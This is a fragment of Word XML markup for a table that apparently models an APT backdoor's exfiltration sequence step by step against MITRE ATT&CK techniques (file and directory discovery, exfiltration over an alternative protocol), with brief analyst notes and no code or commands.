              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>File and Directory</w:t>
            </w:r>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="240E39D2" w14:textId="681946F4" w:rsidR="007E001C" w:rsidRDefault="00242D11" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50CCFDD6" w14:textId="77777777" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="007E001C" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6332DEB2" w14:textId="29DDEDBF" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="007E001C" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31963858" w14:textId="7025B2A0" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="00A55873" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C4D15E2" w14:textId="3786A398" w:rsidR="007E001C" w:rsidRPr="00B857D7" w:rsidRDefault="007E001C" w:rsidP="007E001C">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Specific of attack sequence is not made clear so a simple example is constructed of an Exfiltration attack is included here. The choice of exfiltration is based on APT characterisation in [1]. The actions noted are based on the Backdoor capability documented below (from [6]) and MITRE ATT&amp;CK documented Technique use.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="3BA3AAF9" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07BE5744" w14:textId="684D8FE2" w:rsidR="0022561D" w:rsidRDefault="00506CA4" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C267969" w14:textId="51BA912C" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA00</w:t>
            </w:r>
            <w:r w:rsidR="00C81B62">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
            <w:r w:rsidRPr="00B857D7">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7 Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B0C8357" w14:textId="1C9C7994" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>108</w:t>
            </w:r>
            <w:r w:rsidR="007E001C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="007E001C">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>File and Directory</w:t>
            </w:r>
            <w:r w:rsidRPr="00527381">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A17846A" w14:textId="5A634F42" w:rsidR="0022561D" w:rsidRDefault="00506CA4" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="433F87E3" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="774CDDD6" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AE75ACB" w14:textId="3506E411" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-DIS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789307EB" w14:textId="517AF382" w:rsidR="0022561D" w:rsidRPr="007E001C" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Find information about files visible from backdoor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007E001C" w:rsidRPr="005B3D45" w14:paraId="4DC64060" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F85202" w14:textId="44061515" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="00506CA4" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="786EF07D" w14:textId="77777777" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="530CDC7A" w14:textId="77777777" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7311E8" w14:textId="0F7AB490" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="00506CA4" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6C82C619" w14:textId="77777777" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FF69E99" w14:textId="77777777" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="632F349D" w14:textId="6E2201EC" w:rsidR="007E001C" w:rsidRPr="005B3D45" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07F7B8E8" w14:textId="77777777" w:rsidR="007E001C" w:rsidRDefault="007E001C" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A5AA3">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Send info back</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="183BEB80" w14:textId="76134C55" w:rsidR="007A5AA3" w:rsidRPr="00D400A7" w:rsidRDefault="007A5AA3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>Then next command. For these couples these will be conflated as here.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="720454E6" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="10E2DBD1" w14:textId="605235CD" w:rsidR="0022561D" w:rsidRDefault="004D34A3" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6A178DBB" w14:textId="481029EB" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00234E54" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0010 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Exfiltration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2375" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24A5309A" w14:textId="34BA0103" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00234E54" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1048.002 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00234E54">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Exfiltration Over Alternative Protocol&gt;:Exfiltration Over Asymmetric Encrypted Non-C2 Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="645" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="70464C79" w14:textId="23A268E3" w:rsidR="0022561D" w:rsidRDefault="00506CA4" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53F0B791" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54BF0805" w14:textId="77777777" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="0022561D" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA3998F" w14:textId="1B8E972D" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>AO-EXF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0246D274" w14:textId="59E1CEDB" w:rsidR="0022561D" w:rsidRPr="00B857D7" w:rsidRDefault="00234E54" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[6] </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>fgetp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00242D11" w:rsidRPr="005B3D45" w14:paraId="003FABA9" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F6BED13" w14:textId="4EB87090" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1488" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A72BE8D" w14:textId="77777777" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">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75" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F052074" w14:textId="77777777" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">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45" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02BAFE4D" w14:textId="67D501B9" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="009B5CA6" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00506CA4">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5ABA82B3" w14:textId="77777777" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="597" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4034E5BF" w14:textId="77777777" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="741" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="485E9D43" w14:textId="652BB2B3" w:rsidR="00242D11" w:rsidRPr="005B3D45" w:rsidRDefault="00A55873" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3324" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29857754" w14:textId="2C3135FA" w:rsidR="00242D11" w:rsidRPr="00D400A7" w:rsidRDefault="00242D11" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">Then next command. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0022561D" w:rsidRPr="00B857D7" w14:paraId="6F55FC3B" w14:textId="77777777" w:rsidTr="00242D11">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B39F491" w14:textId="1AA26447" w:rsidR="0022561D" w:rsidRDefault="00EC2C26" w:rsidP="00D23EEA">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
